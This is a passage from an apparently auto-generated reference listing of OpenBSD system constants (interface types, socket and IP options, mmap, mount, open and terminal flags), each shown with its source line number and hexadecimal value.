IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 753) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 754) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 755) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 756) | IFT_PVC = 0xf2 constant IFT_Q2931 (line 757) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 758) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 759) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 760) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 761) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 762) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 763) | IFT_RS232 = 0x21 constant IFT_RSRB (line 764) | IFT_RSRB = 0x4f constant IFT_SDLC (line 765) | IFT_SDLC = 0x11 constant IFT_SDSL (line 766) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 767) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 768) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 769) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 770) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 771) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 772) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 773) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 774) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 775) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 776) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 777) | IFT_SONETVT = 0x33 constant IFT_SRP (line 778) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 779) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 780) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 781) | IFT_STARLAN = 0xb constant IFT_T1 (line 782) | IFT_T1 = 0x12 constant IFT_TDLC (line 783) | IFT_TDLC = 0x74 constant IFT_TELINK (line 784) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 785) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 786) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 787) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 788) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 789) | IFT_ULTRA = 0x1d constant IFT_USB (line 790) | IFT_USB = 0xa0 constant IFT_V11 (line 791) | IFT_V11 = 0x40 constant IFT_V35 (line 792) | IFT_V35 = 0x2d constant IFT_V36 (line 793) | IFT_V36 = 0x41 constant IFT_V37 (line 794) | IFT_V37 = 0x78 constant IFT_VDSL (line 795) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 796) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 797) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 798) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 799) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 800) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 801) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 802) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 803) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 804) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 805) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 806) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 807) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 808) | IFT_VOICEOVERIP = 0x68 constant IFT_WIREGUARD (line 809) | IFT_WIREGUARD = 0xfb constant IFT_X213 (line 810) | IFT_X213 = 0x5d constant IFT_X25 (line 811) | IFT_X25 = 0x5 constant IFT_X25DDN (line 812) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 813) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 814) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 815) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 816) | IFT_XETHER = 0x1a constant IGNBRK (line 817) | IGNBRK = 0x1 constant IGNCR (line 818) | IGNCR = 0x80 constant IGNPAR (line 819) | IGNPAR = 0x4 constant IMAXBEL (line 820) | IMAXBEL = 0x2000 constant INLCR (line 821) | INLCR = 0x40 constant INPCK (line 822) | INPCK = 0x10 constant IN_CLASSA_HOST (line 823) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 824) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 825) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 826) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 827) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 828) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 829) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 830) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 831) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 832) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 833) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 834) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 835) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 836) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 837) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_HOST (line 838) | IN_RFC3021_HOST = 0x1 constant IN_RFC3021_NET (line 839) | IN_RFC3021_NET = 0xfffffffe constant IN_RFC3021_NSHIFT (line 840) | IN_RFC3021_NSHIFT = 0x1f constant IPPROTO_AH (line 841) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 842) | IPPROTO_CARP = 0x70 constant IPPROTO_DIVERT (line 843) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 844) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 845) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 846) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 847) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 848) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 849) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 850) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 851) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 852) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 853) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 854) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 855) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 856) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 857) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 858) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 859) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 860) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 861) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 862) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 863) | IPPROTO_IPV6 = 0x29 constant IPPROTO_MAX (line 864) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 865) | IPPROTO_MAXID = 0x103 constant IPPROTO_MOBILE (line 866) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 867) | IPPROTO_MPLS = 0x89 constant IPPROTO_NONE (line 868) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 869) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 870) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 871) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 872) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 873) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 874) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 875) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 876) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 877) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 878) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 879) | IPPROTO_UDPLITE = 0x88 constant IPV6_AUTH_LEVEL (line 880) | IPV6_AUTH_LEVEL = 0x35 constant IPV6_AUTOFLOWLABEL (line 881) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_CHECKSUM (line 882) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 883) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 884) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 885) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 886) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 887) | IPV6_DSTOPTS = 0x32 constant IPV6_ESP_NETWORK_LEVEL (line 888) | IPV6_ESP_NETWORK_LEVEL = 0x37 constant IPV6_ESP_TRANS_LEVEL (line 889) | IPV6_ESP_TRANS_LEVEL = 0x36 constant IPV6_FAITH (line 890) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 891) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 892) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 893) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 894) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 895) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 896) | IPV6_HOPOPTS = 0x31 constant IPV6_IPCOMP_LEVEL (line 897) | IPV6_IPCOMP_LEVEL = 0x3c constant IPV6_JOIN_GROUP (line 898) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 899) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 900) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 901) | IPV6_MAXPACKET = 0xffff constant IPV6_MINHOPCOUNT (line 902) | IPV6_MINHOPCOUNT = 0x41 constant IPV6_MMTU (line 903) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 904) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 905) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 906) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 907) | IPV6_NEXTHOP = 0x30 constant IPV6_OPTIONS (line 908) | IPV6_OPTIONS = 0x1 constant IPV6_PATHMTU (line 909) | IPV6_PATHMTU = 0x2c constant IPV6_PIPEX (line 910) | IPV6_PIPEX = 0x3f constant IPV6_PKTINFO (line 911) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 912) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 913) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 914) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 915) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 916) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVDSTPORT (line 917) | IPV6_RECVDSTPORT = 0x40 constant IPV6_RECVHOPLIMIT (line 918) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 919) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 920) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 921) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 922) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 923) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTABLE (line 924) | IPV6_RTABLE = 0x1021 constant IPV6_RTHDR (line 925) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 926) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 927) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 928) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 929) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 930) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 931) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 932) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 933) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 934) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 935) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 936) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 937) | IP_ADD_MEMBERSHIP = 0xc constant IP_AUTH_LEVEL (line 938) | IP_AUTH_LEVEL = 0x14 constant IP_DEFAULT_MULTICAST_LOOP (line 939) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 940) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 941) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 942) | IP_DROP_MEMBERSHIP = 0xd constant IP_ESP_NETWORK_LEVEL (line 943) | IP_ESP_NETWORK_LEVEL = 0x16 constant IP_ESP_TRANS_LEVEL (line 944) | IP_ESP_TRANS_LEVEL = 0x15 constant IP_HDRINCL (line 945) | IP_HDRINCL = 0x2 constant IP_IPCOMP_LEVEL (line 946) | IP_IPCOMP_LEVEL = 0x1d constant IP_IPDEFTTL (line 947) | IP_IPDEFTTL = 0x25 constant IP_IPSECFLOWINFO (line 948) | IP_IPSECFLOWINFO = 0x24 constant IP_IPSEC_LOCAL_AUTH (line 949) | IP_IPSEC_LOCAL_AUTH = 0x1b constant IP_IPSEC_LOCAL_CRED (line 950) | IP_IPSEC_LOCAL_CRED = 0x19 constant IP_IPSEC_LOCAL_ID (line 951) | IP_IPSEC_LOCAL_ID = 0x17 constant IP_IPSEC_REMOTE_AUTH (line 952) | IP_IPSEC_REMOTE_AUTH = 0x1c constant IP_IPSEC_REMOTE_CRED (line 953) | IP_IPSEC_REMOTE_CRED = 0x1a constant IP_IPSEC_REMOTE_ID (line 954) | IP_IPSEC_REMOTE_ID = 0x18 constant IP_MAXPACKET (line 955) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 956) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x20 constant IP_MIN_MEMBERSHIPS (line 959) | IP_MIN_MEMBERSHIPS = 0xf constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 964) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 965) | IP_OPTIONS = 0x1 constant IP_PIPEX (line 966) | IP_PIPEX = 0x22 constant IP_PORTRANGE (line 967) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 968) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 969) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 970) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 971) | IP_RECVDSTADDR = 0x7 constant IP_RECVDSTPORT (line 972) | IP_RECVDSTPORT = 0x21 constant IP_RECVIF (line 973) | IP_RECVIF = 0x1e constant IP_RECVOPTS (line 974) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 975) | IP_RECVRETOPTS = 0x6 constant IP_RECVRTABLE (line 976) | IP_RECVRTABLE = 0x23 constant IP_RECVTTL (line 977) | IP_RECVTTL = 0x1f constant IP_RETOPTS (line 978) | IP_RETOPTS = 0x8 constant IP_RF (line 979) | IP_RF = 0x8000 constant IP_RTABLE (line 980) | IP_RTABLE = 0x1021 constant IP_SENDSRCADDR (line 981) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 982) | IP_TOS = 0x3 constant IP_TTL (line 983) | IP_TTL = 0x4 constant ISIG (line 984) | ISIG = 0x80 constant ISTRIP (line 985) | ISTRIP = 0x20 constant ITIMER_PROF (line 986) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 987) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 988) | ITIMER_VIRTUAL = 0x1 constant IUCLC (line 989) | IUCLC = 0x1000 constant IXANY (line 990) | IXANY = 0x800 constant IXOFF (line 991) | IXOFF = 0x400 constant IXON (line 992) | IXON = 0x200 constant KERN_HOSTNAME (line 993) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 994) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 995) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 996) | KERN_VERSION = 0x4 constant LCNT_OVERLOAD_FLUSH (line 997) | LCNT_OVERLOAD_FLUSH = 0x6 constant LOCK_EX (line 998) | LOCK_EX = 0x2 constant LOCK_NB (line 999) | LOCK_NB = 0x4 constant LOCK_SH (line 1000) | LOCK_SH = 0x1 constant LOCK_UN (line 1001) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 1002) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1003) | MADV_FREE = 0x6 constant MADV_NORMAL (line 1004) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 1005) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1006) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 1007) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 1008) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 1009) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1010) | MAP_ANONYMOUS = 0x1000 constant MAP_CONCEAL (line 1011) | MAP_CONCEAL = 0x8000 constant MAP_COPY (line 1012) | MAP_COPY = 0x2 constant MAP_FILE (line 1013) | MAP_FILE = 0x0 constant MAP_FIXED (line 1014) | MAP_FIXED = 0x10 constant MAP_FLAGMASK (line 1015) | MAP_FLAGMASK = 0xfff7 constant MAP_HASSEMAPHORE (line 1016) | MAP_HASSEMAPHORE = 0x0 constant MAP_INHERIT (line 1017) | MAP_INHERIT = 0x0 constant MAP_INHERIT_COPY (line 1018) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_NONE (line 1019) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1020) | MAP_INHERIT_SHARE = 0x0 constant MAP_INHERIT_ZERO (line 1021) | MAP_INHERIT_ZERO = 0x3 constant MAP_NOEXTEND (line 1022) | MAP_NOEXTEND = 0x0 constant MAP_NORESERVE (line 1023) | MAP_NORESERVE = 0x0 constant MAP_PRIVATE (line 1024) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1025) | MAP_RENAME = 0x0 constant MAP_SHARED (line 1026) | MAP_SHARED = 0x1 constant MAP_STACK (line 1027) | MAP_STACK = 0x4000 constant MAP_TRYFIXED (line 1028) | MAP_TRYFIXED = 0x0 constant MCL_CURRENT (line 1029) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1030) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1031) | MNT_ASYNC = 0x40 constant MNT_DEFEXPORTED (line 1032) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1033) | MNT_DELEXPORT = 0x20000 constant MNT_DOOMED (line 1034) | MNT_DOOMED = 0x8000000 constant MNT_EXPORTANON (line 1035) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1036) | MNT_EXPORTED = 0x100 constant MNT_EXRDONLY (line 1037) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1038) | MNT_FORCE = 0x80000 constant MNT_LAZY (line 1039) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1040) | MNT_LOCAL = 0x1000 constant MNT_NOATIME (line 1041) | MNT_NOATIME = 0x8000 constant MNT_NODEV (line 1042) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1043) | MNT_NOEXEC = 0x4 constant MNT_NOPERM (line 1044) | MNT_NOPERM = 0x20 constant MNT_NOSUID (line 1045) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1046) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1047) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1048) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1049) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1050) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1051) | MNT_SOFTDEP = 0x4000000 constant MNT_STALLED (line 1052) | MNT_STALLED = 0x100000 constant MNT_SWAPPABLE (line 1053) | MNT_SWAPPABLE = 0x200000 constant MNT_SYNCHRONOUS (line 1054) | MNT_SYNCHRONOUS = 0x2 constant MNT_UPDATE (line 1055) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1056) | MNT_VISFLAGMASK = 0x400ffff constant MNT_WAIT (line 1057) | MNT_WAIT = 0x1 constant MNT_WANTRDWR (line 1058) | MNT_WANTRDWR = 0x2000000 constant MNT_WXALLOWED (line 1059) | MNT_WXALLOWED = 0x800 constant MOUNT_AFS (line 1060) | MOUNT_AFS = "afs" constant MOUNT_CD9660 (line 1061) | MOUNT_CD9660 = "cd9660" constant MOUNT_EXT2FS (line 1062) | MOUNT_EXT2FS = "ext2fs" constant MOUNT_FFS (line 1063) | MOUNT_FFS = "ffs" constant MOUNT_FUSEFS (line 1064) | MOUNT_FUSEFS = "fuse" constant MOUNT_MFS (line 1065) | MOUNT_MFS = "mfs" constant MOUNT_MSDOS (line 1066) | MOUNT_MSDOS = "msdos" constant MOUNT_NCPFS (line 1067) | MOUNT_NCPFS = "ncpfs" constant MOUNT_NFS (line 1068) | MOUNT_NFS = "nfs" constant MOUNT_NTFS (line 1069) | MOUNT_NTFS = "ntfs" constant MOUNT_TMPFS (line 1070) | MOUNT_TMPFS = "tmpfs" constant MOUNT_UDF (line 1071) | MOUNT_UDF = "udf" constant MOUNT_UFS (line 1072) | MOUNT_UFS = "ffs" constant MSG_BCAST (line 1073) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1074) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CTRUNC (line 1075) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1076) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1077) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1078) | MSG_EOR = 0x8 constant MSG_MCAST (line 1079) | MSG_MCAST = 0x200 constant MSG_NOSIGNAL (line 1080) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1081) | MSG_OOB = 0x1 constant MSG_PEEK (line 1082) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1083) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1084) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1085) | MSG_WAITFORONE = 0x1000 constant MS_ASYNC (line 1086) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1087) | MS_INVALIDATE = 0x4 constant MS_SYNC (line 1088) | MS_SYNC = 0x2 constant NAME_MAX (line 1089) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1090) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1091) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1092) | NET_RT_IFLIST = 0x3 constant NET_RT_IFNAMES (line 1093) | NET_RT_IFNAMES = 0x6 constant NET_RT_MAXID (line 1094) | NET_RT_MAXID = 0x8 constant NET_RT_SOURCE (line 1095) | NET_RT_SOURCE = 0x7 constant NET_RT_STATS (line 1096) | NET_RT_STATS = 0x4 constant NET_RT_TABLE (line 1097) | NET_RT_TABLE = 0x5 constant NFDBITS (line 1098) | NFDBITS = 0x20 constant NOFLSH (line 1099) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1100) | NOKERNINFO = 0x2000000 constant NOTE_ATTRIB (line 1101) | NOTE_ATTRIB = 0x8 constant NOTE_CHANGE (line 1102) | NOTE_CHANGE = 0x1 constant NOTE_CHILD (line 1103) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1104) | NOTE_DELETE = 0x1 constant NOTE_EOF (line 1105) | NOTE_EOF = 0x2 constant NOTE_EXEC (line 1106) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1107) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1108) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1109) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1110) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1111) | NOTE_LOWAT = 0x1 constant NOTE_OOB (line 1112) | NOTE_OOB = 0x4 constant NOTE_PCTRLMASK (line 1113) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1114) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1115) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1116) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1117) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1118) | NOTE_TRACKERR = 0x2 constant NOTE_TRUNCATE (line 1119) | NOTE_TRUNCATE = 0x80 constant NOTE_WRITE (line 1120) | NOTE_WRITE = 0x2 constant OCRNL (line 1121) | OCRNL = 0x10 constant OLCUC (line 1122) | OLCUC = 0x20 constant ONLCR (line 1123) | ONLCR = 0x2 constant ONLRET (line 1124) | ONLRET = 0x80 constant ONOCR (line 1125) | ONOCR = 0x40 constant ONOEOT (line 1126) | ONOEOT = 0x8 constant OPOST (line 1127) | OPOST = 0x1 constant OXTABS (line 1128) | OXTABS = 0x4 constant O_ACCMODE (line 1129) | O_ACCMODE = 0x3 constant O_APPEND (line 1130) | O_APPEND = 0x8 constant O_ASYNC (line 1131) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1132) | O_CLOEXEC = 0x10000 constant O_CREAT (line 1133) | O_CREAT = 0x200 constant O_DIRECTORY (line 1134) | O_DIRECTORY = 0x20000 constant O_DSYNC (line 1135) | O_DSYNC = 0x80 constant O_EXCL (line 1136) | O_EXCL = 0x800 constant O_EXLOCK (line 1137) | O_EXLOCK = 0x20 constant O_FSYNC (line 1138) | O_FSYNC = 0x80 constant O_NDELAY (line 1139) | O_NDELAY = 0x4 constant O_NOCTTY (line 1140) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1141) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1142) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1143) | O_RDONLY = 0x0 constant O_RDWR (line 1144) | O_RDWR = 0x2 constant O_RSYNC (line 1145) | O_RSYNC = 0x80 constant O_SHLOCK (line 1146) | O_SHLOCK = 0x10 constant O_SYNC (line 1147) | O_SYNC = 0x80 constant O_TRUNC (line 1148) | O_TRUNC = 0x400 constant O_WRONLY (line 1149) | O_WRONLY = 0x1 constant PARENB (line 1150) | PARENB = 0x1000 constant PARMRK (line 1151) | PARMRK = 0x8 constant PARODD (line 1152) | PARODD = 0x2000 constant PENDIN (line 1153) | PENDIN = 0x20000000 constant PF_FLUSH (line 1154) | PF_FLUSH = 0x1 constant PRIO_PGRP (line 1155) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1156) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1157) | PRIO_USER = 0x2 constant PROT_EXEC (line 1158) | PROT_EXEC = 0x4 constant PROT_NONE (line 1159) | PROT_NONE = 0x0 constant PROT_READ (line 1160) | PROT_READ = 0x1 constant PROT_WRITE (line 1161) | PROT_WRITE = 0x2 constant RLIMIT_CORE (line 1162) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1163) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1164) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1165) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1166) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1167) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1168) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1169) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1170) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1171) | RLIM_INFINITY = 